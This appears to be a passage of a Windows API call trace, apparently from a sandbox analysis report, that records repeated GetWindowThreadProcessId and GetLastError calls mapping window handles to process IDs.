	[0201.754] GetLastError () returned 0x0
	[0201.754] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9d0
	[0201.755] GetLastError () returned 0x0
	[0201.755] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9c0
	[0201.755] GetLastError () returned 0x0
	[0201.755] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9b0
	[0201.755] GetLastError () returned 0x0
	[0201.755] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9a0
	[0201.755] GetLastError () returned 0x0
	[0201.755] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x990
	[0201.755] GetLastError () returned 0x0
	[0201.755] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x980
	[0201.756] GetLastError () returned 0x0
	[0201.756] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x970
	[0201.756] GetLastError () returned 0x0
	[0201.756] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x960
	[0201.756] GetLastError () returned 0x0
	[0201.756] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x950
	[0201.756] GetLastError () returned 0x0
	[0201.756] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x940
	[0201.756] GetLastError () returned 0x0
	[0201.756] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x930
	[0201.756] GetLastError () returned 0x0
	[0201.757] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x920
	[0201.757] GetLastError () returned 0x0
	[0201.757] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x910
	[0201.757] GetLastError () returned 0x0
	[0201.757] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x900
	[0201.757] GetLastError () returned 0x0
	[0201.757] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8f0
	[0201.757] GetLastError () returned 0x0
	[0201.757] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8e0
	[0201.757] GetLastError () returned 0x0
	[0201.757] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8d0
	[0201.757] GetLastError () returned 0x0
	[0201.758] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8c0
	[0201.758] GetLastError () returned 0x0
	[0201.758] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8b0
	[0201.758] GetLastError () returned 0x0
	[0201.758] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8a0
	[0201.758] GetLastError () returned 0x0
	[0201.758] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x890
	[0201.758] GetLastError () returned 0x0
	[0201.758] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x880
	[0201.758] GetLastError () returned 0x0
	[0201.758] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x870
	[0201.759] GetLastError () returned 0x0
	[0201.759] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x860
	[0201.759] GetLastError () returned 0x0
	[0201.759] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x850
	[0201.759] GetLastError () returned 0x0
	[0201.759] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x840
	[0201.759] GetLastError () returned 0x0
	[0201.759] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x830
	[0201.759] GetLastError () returned 0x0
	[0201.759] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x820
	[0201.759] GetLastError () returned 0x0
	[0201.760] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x810
	[0201.760] GetLastError () returned 0x0
	[0201.760] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x20c
	[0201.760] GetLastError () returned 0x0
	[0201.760] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7c4
	[0201.760] GetLastError () returned 0x0
	[0201.760] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xc0
	[0201.760] GetLastError () returned 0x0
	[0201.760] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x688
	[0201.760] GetLastError () returned 0x0
	[0201.760] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x6c0
	[0201.760] GetLastError () returned 0x0
	[0201.761] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x408
	[0201.761] GetLastError () returned 0x0
	[0201.761] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7d4
	[0201.761] GetLastError () returned 0x0
	[0201.761] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x544
	[0201.761] GetLastError () returned 0x0
	[0201.761] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x540
	[0201.761] GetLastError () returned 0x0
	[0201.761] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x71c
	[0201.761] GetLastError () returned 0x0
	[0201.761] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x31c
	[0201.761] GetLastError () returned 0x0
	[0201.762] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7ec
	[0201.762] GetLastError () returned 0x0
	[0201.762] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x5b8
	[0201.762] GetLastError () returned 0x0
	[0201.762] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x754
	[0201.762] GetLastError () returned 0x0
	[0201.762] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x664
	[0201.762] GetLastError () returned 0x0
	[0201.762] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x640
	[0201.762] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x700
	[0201.763] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x410
	[0201.763] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7a0
	[0201.763] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x3b4
	[0201.763] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x5cc
	[0201.763] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x5d4
	[0201.763] GetLastError () returned 0x0
	[0201.763] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7c0
	[0201.764] GetLastError () returned 0x0
	[0201.764] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x364
	[0201.764] GetLastError () returned 0x0
	[0201.764] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x240
	[0201.764] GetLastError () returned 0x0
	[0201.764] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x560
	[0201.764] GetLastError () returned 0x0
	[0201.764] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x57c
	[0201.764] GetLastError () returned 0x0
	[0201.764] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7b0
	[0201.764] GetLastError () returned 0x0
	[0201.764] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x6a4
	[0201.764] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x32c
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x670
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4f0
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x514
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x50c
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x514
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x50c
	[0201.765] GetLastError () returned 0x0
	[0201.765] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x514
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4f0
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4f0
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x58c
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x578
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x530
	[0201.766] GetLastError () returned 0x0
	[0201.766] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.766] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x508
	[0201.767] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.767] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4f4
	[0201.767] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.767] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.767] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x794
	[0201.767] GetLastError () returned 0x0
	[0201.767] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.767] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.768] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.768] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.768] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x448
	[0201.768] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x778
	[0201.768] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.768] GetLastError () returned 0x0
	[0201.768] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x538
	[0201.769] GetLastError () returned 0x0
	[0201.769] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.769] GetLastError () returned 0x0
	[0201.769] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.769] GetLastError () returned 0x0
	[0201.769] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x938
	[0201.769] GetLastError () returned 0x0
	[0201.769] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7c8
	[0201.769] GetLastError () returned 0x0
	[0201.769] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xbdc
	[0201.769] GetLastError () returned 0x0
	[0201.770] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xbe0
	[0201.770] GetLastError () returned 0x0
	[0201.770] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9f4
	[0201.770] GetLastError () returned 0x0
	[0201.770] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x964
	[0201.770] GetLastError () returned 0x0
	[0201.770] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9e8
	[0201.770] GetLastError () returned 0x0
	[0201.770] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9e8
	[0201.770] GetLastError () returned 0x0
	[0201.770] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xb40
	[0201.771] GetLastError () returned 0x0
	[0201.771] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xa00
	[0201.771] GetLastError () returned 0x0
	[0201.771] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9f0
	[0201.974] GetLastError () returned 0x0
	[0201.974] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9e0
	[0201.974] GetLastError () returned 0x0
	[0201.975] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9d0
	[0201.975] GetLastError () returned 0x0
	[0201.975] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9c0
	[0201.975] GetLastError () returned 0x0
	[0201.975] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9b0
	[0201.975] GetLastError () returned 0x0
	[0201.975] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9a0
	[0201.975] GetLastError () returned 0x0
	[0201.975] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x990
	[0201.975] GetLastError () returned 0x0
	[0201.975] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x980
	[0201.975] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x970
	[0201.976] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x960
	[0201.976] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x950
	[0201.976] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x940
	[0201.976] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x930
	[0201.976] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x920
	[0201.976] GetLastError () returned 0x0
	[0201.976] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x910
	[0201.977] GetLastError () returned 0x0
	[0201.977] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x900
	[0201.977] GetLastError () returned 0x0
	[0201.977] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8f0
	[0201.977] GetLastError () returned 0x0
	[0201.977] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8e0
	[0201.977] GetLastError () returned 0x0
	[0201.977] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8d0
	[0201.977] GetLastError () returned 0x0
	[0201.977] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8c0
	[0201.977] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8b0
	[0201.978] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8a0
	[0201.978] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x890
	[0201.978] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x880
	[0201.978] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x870
	[0201.978] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x860
	[0201.978] GetLastError () returned 0x0
	[0201.978] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x850
	[0201.979] GetLastError () returned 0x0
	[0201.979] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x840
	[0201.979] GetLastError () returned 0x0
	[0201.979] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x830
	[0201.979] GetLastError () returned 0x0
	[0201.979] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x820
	[0201.979] GetLastError () returned 0x0
	[0201.979] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x810
	[0201.979] GetLastError () returned 0x0
	[0201.979] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x20c
	[0201.979] GetLastError () returned 0x0
	[0201.979] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7c4
	[0201.979] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xc0
	[0201.980] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x688
	[0201.980] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x6c0
	[0201.980] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x408
	[0201.980] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7d4
	[0201.980] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x544
	[0201.980] GetLastError () returned 0x0
	[0201.980] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x540
	[0201.981] GetLastError () returned 0x0
	[0201.981] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x71c
	[0201.981] GetLastError () returned 0x0
	[0201.981] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x31c
	[0201.981] GetLastError () returned 0x0
	[0201.981] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7ec
	[0201.981] GetLastError () returned 0x0
	[0201.981] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x5b8
	[0201.981] GetLastError () returned 0x0
	[0201.981] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x754
	[0201.981] GetLastError () returned 0x0
	[0201.981] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x664
	[0201.982] GetLastError () returned 0x0
	[0201.982] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x640
	[0201.982] GetLastError () returned 0x0
	[0201.982] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x700
	[0201.982] GetLastError () returned 0x0
	[0201.982] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x410
	[0201.982] GetLastError () returned 0x0
	[0201.982] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7a0
	[0201.982] GetLastError () returned 0x0
	[0201.982] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x3b4
	[0201.982] GetLastError () returned 0x0
	[0201.982] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x5cc
	[0201.982] GetLastError () returned 0x0
	[0201.983] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x5d4
	[0201.983] GetLastError () returned 0x0
	[0201.983] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x7c0
	[0201.983] GetLastError () returned 0x0
	[0201.983] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x364
	[0201.983] GetLastError () returned 0x0
	[0201.983] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x240
	[0201.983] GetLastError () returned 0x0
	[0201.983] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x560
	[0201.983] GetLastError () returned 0x0
	[0201.983] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x57c
